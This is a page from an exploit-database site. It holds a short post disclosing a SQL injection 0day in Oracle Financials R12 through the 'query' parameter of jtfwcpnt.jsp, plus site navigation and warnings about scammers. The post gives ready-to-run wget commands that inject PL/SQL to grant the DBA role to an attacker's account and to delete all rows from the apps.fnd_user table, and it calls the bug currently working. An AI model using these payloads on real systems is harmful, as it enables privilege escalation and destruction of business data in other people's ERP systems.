0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle Financials R12 SQL injection vulnerability
================================================= Oracle Financials R12 SQL injection vulnerability ================================================= Yesterday a friend of mine told me that I "forget" to share with the general public one small detail about a presentation [1] I given at the conference RootedCon 2010 [2]. In the presentation there is a currently working 0day against Oracle Financials R12. The 0day is too obvious and pretty simple to exploit (as is common with Oracle software). In Oracle Financials R12 there is one script called jtfwcpnt.jsp which receives a parameter called "query". I think that no other explanation is required. Anyway, this is a simple "exploit" extracted from the presentation: $ export TARGET=â€http://<target>:<port>/OA_HTML†$ wget -O - “$TARGET/OA.jsp†"$TARGET/jtfwcpnt.jsp?query=begin%20execute %20immediate%20'grant%20dba%20to%20mom';%20end;†$ wget -O - “$TARGET/OA.jsp†"$TARGET/jtfwcpnt.jsp?query=begin%20execute %20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;†Just in case you don't want to view the slides online or you hate (or fear) Flash as I do, you can download the slides from my website [3] in ODP format. # 0day.today [2024-11-15] #